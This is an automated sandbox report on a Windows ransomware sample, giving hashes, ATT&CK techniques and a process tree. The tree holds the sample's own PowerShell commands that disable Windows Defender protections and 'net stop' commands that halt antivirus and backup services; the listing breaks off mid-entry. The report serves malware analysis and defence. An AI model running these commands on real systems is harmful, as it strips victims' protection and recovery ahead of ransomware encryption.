1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
8s
max time network
151s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Size

82KB
MD5

e01e11dca5e8b08fc8231b1cb6e2048c
SHA1

4983d07f004436caa3f10b38adacbba6a4ede01a
SHA256

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f
SHA512

298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 6 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

5872 icacls.exe
4892 icacls.exe
2652 icacls.exe
4020 icacls.exe
1808 icacls.exe
3212 icacls.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
5872	icacls.exe
4892	icacls.exe
2652	icacls.exe
4020	icacls.exe
1808	icacls.exe
3212	icacls.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
4892	vssadmin.exe
5900	vssadmin.exe
3892	vssadmin.exe
4904	vssadmin.exe
1540	vssadmin.exe
6076	vssadmin.exe
4932	vssadmin.exe
5540	vssadmin.exe
5896	vssadmin.exe
5684	vssadmin.exe
4008	vssadmin.exe
3628	vssadmin.exe
4700	vssadmin.exe
3672	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3372	taskkill.exe
2120	taskkill.exe
5552	taskkill.exe
3912	taskkill.exe
4472	taskkill.exe
4696	taskkill.exe
5436	taskkill.exe
3040	taskkill.exe
5272	taskkill.exe
6044	taskkill.exe
4336	taskkill.exe
4428	taskkill.exe
3708	taskkill.exe
3332	taskkill.exe
5688	taskkill.exe
3884	taskkill.exe
4172	taskkill.exe
4716	taskkill.exe
2120	taskkill.exe
2600	taskkill.exe
272	taskkill.exe
1680	taskkill.exe
5268	taskkill.exe
5896	taskkill.exe
1448	taskkill.exe
4964	taskkill.exe
1136	taskkill.exe
1680	taskkill.exe
5312	taskkill.exe
1464	taskkill.exe
4936	taskkill.exe
5984	taskkill.exe
6000	taskkill.exe
4876	taskkill.exe
4004	taskkill.exe
5240	taskkill.exe
4924	taskkill.exe
3352	taskkill.exe
5368	taskkill.exe
4880	taskkill.exe
5028	taskkill.exe
5228	taskkill.exe
4732	taskkill.exe
1832	taskkill.exe
5608	taskkill.exe
3236	taskkill.exe
5792	taskkill.exe
2392	taskkill.exe
3984	taskkill.exe
4228	taskkill.exe
5176	taskkill.exe
1288	taskkill.exe
4380	taskkill.exe
2096	taskkill.exe
5724	taskkill.exe
5116	taskkill.exe
5884	taskkill.exe
1464	taskkill.exe
4900	taskkill.exe
5840	taskkill.exe
4780	taskkill.exe
4044	taskkill.exe
5568	taskkill.exe
4316	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

1304 reg.exe
4124 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

4380 PING.EXE
3040 PING.EXE

pid	process
1304	reg.exe
4124	reg.exe

pid	process
4380	PING.EXE
3040	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exepowershell.exe

pid	process
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
1164	powershell.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
1164	powershell.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
1164	powershell.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenet1.exepowershell.exenet1.exepowershell.exeicacls.exenet1.exe

description	pid	process
Token: SeDebugPrivilege	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeIncreaseQuotaPrivilege	1164	powershell.exe
Token: SeSecurityPrivilege	1164	powershell.exe
Token: SeTakeOwnershipPrivilege	1164	powershell.exe
Token: SeLoadDriverPrivilege	1164	powershell.exe
Token: SeSystemProfilePrivilege	1164	powershell.exe
Token: SeSystemtimePrivilege	1164	powershell.exe
Token: SeProfSingleProcessPrivilege	1164	powershell.exe
Token: SeIncBasePriorityPrivilege	1164	powershell.exe
Token: SeCreatePagefilePrivilege	1164	powershell.exe
Token: SeBackupPrivilege	1164	powershell.exe
Token: SeRestorePrivilege	1164	powershell.exe
Token: SeShutdownPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeSystemEnvironmentPrivilege	1164	powershell.exe
Token: SeRemoteShutdownPrivilege	1164	powershell.exe
Token: SeUndockPrivilege	1164	powershell.exe
Token: SeManageVolumePrivilege	1164	powershell.exe
Token: 33	1164	powershell.exe
Token: 34	1164	powershell.exe
Token: 35	1164	powershell.exe
Token: 36	1164	powershell.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	3984	net1.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	1724	net1.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	3212	icacls.exe
Token: SeDebugPrivilege	4212	net1.exe
Token: SeDebugPrivilege	4356

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exenetsh.exeConhost.exenet.exe

description	pid	process	target process
PID 4052 wrote to memory of 1164	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 1164	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 1388	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 1388	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3296	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3296	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3104	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3104	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3904	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3904	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3984	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3984	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 1136	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 1136	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 1724	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 1724	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 2684	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 2684	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3212	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 3212	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 4212	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 4212	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 4356	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4356	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4496	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4496	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4540	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	netsh.exe
PID 4052 wrote to memory of 4540	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	netsh.exe
PID 4052 wrote to memory of 4572	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4572	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4632	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4632	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4664	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4664	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4700	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4700	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4772	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 4772	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	powershell.exe
PID 4052 wrote to memory of 4820	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4820	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 4880	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	taskkill.exe
PID 4052 wrote to memory of 4880	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	taskkill.exe
PID 4052 wrote to memory of 4928	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4928	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	Conhost.exe
PID 4052 wrote to memory of 4980	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	taskkill.exe
PID 4052 wrote to memory of 4980	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	taskkill.exe
PID 4540 wrote to memory of 5052	4540	netsh.exe	net1.exe
PID 4540 wrote to memory of 5052	4540	netsh.exe	net1.exe
PID 4052 wrote to memory of 5068	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	sc.exe
PID 4052 wrote to memory of 5068	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	sc.exe
PID 4052 wrote to memory of 5100	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4052 wrote to memory of 5100	4052	58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe	net.exe
PID 4572 wrote to memory of 5108	4572	Conhost.exe	net1.exe
PID 4572 wrote to memory of 5108	4572	Conhost.exe	net1.exe
PID 4632 wrote to memory of 2156	4632	net.exe	net.exe
PID 4632 wrote to memory of 2156	4632	net.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:3984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:3212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:2156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:5224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:4928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5324
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:5068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:5100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:6032
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:6020
  - - C:\Windows\system32\net1.exe
